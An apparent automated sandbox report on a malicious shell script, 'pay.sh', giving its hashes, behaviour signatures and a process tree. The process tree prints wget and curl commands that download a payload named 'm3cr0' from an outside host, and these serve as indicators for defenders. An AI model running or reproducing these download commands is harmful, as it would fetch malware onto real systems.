Analysis

  • max time kernel
    148s
  • max time network
    27s
  • platform
    debian-9_armhf
  • resource
    debian9-armhf-20240611-en
  • resource tags

    arch:armhfimage:debian9-armhf-20240611-enkernel:4.9.0-13-armmp-lpaelocale:en-usos:debian-9-armhfsystem
  • submitted
    22-10-2024 16:06

General

  • Target

    pay.sh

  • Size

    3KB

  • MD5

    cf70ee36f1e9247f2146e4981924d4f4

  • SHA1

    7eabae4200118c4e89979658db6e4d905fe3dae9

  • SHA256

    0076fe37f41ee52f12cf76c5bbbc5eb726ce534ec6da22c358499bb948d17b6c

  • SHA512

    60f6bdf8813ee328f747b722e8d8abb8ecd91836a96de7e877217c6794d4dcef56130f3f833f748637b0a7b81bac94ea7e3d9cb3dfff0a2060eab34c20070bd0

Score
4/10

Malware Config

Signatures

  • Checks CPU configuration 1 TTPs 1 IoCs

    Checks CPU information which indicate if the system is a virtual machine.

  • Reads runtime system information 2 IoCs

    Reads data from /proc virtual filesystem.

  • Writes file to tmp directory 1 IoCs

    Malware often drops required files in the /tmp directory.

Processes

  • /tmp/pay.sh
    /tmp/pay.sh
    1⤵
      PID:650
      • /usr/bin/wget
        wget http://floodernetwork111.accesscam.org:8089/b/m3cr0 -O m3cr0
        2⤵
        • Writes file to tmp directory
        PID:652
      • /usr/bin/curl
        curl http://floodernetwork111.accesscam.org:8089/b/m3cr0 -o m3cr0
        2⤵
        • Checks CPU configuration
        • Reads runtime system information
        PID:662

    Network

    MITRE ATT&CK Enterprise v15

    Replay Monitor

    Loading Replay Monitor...

    Downloads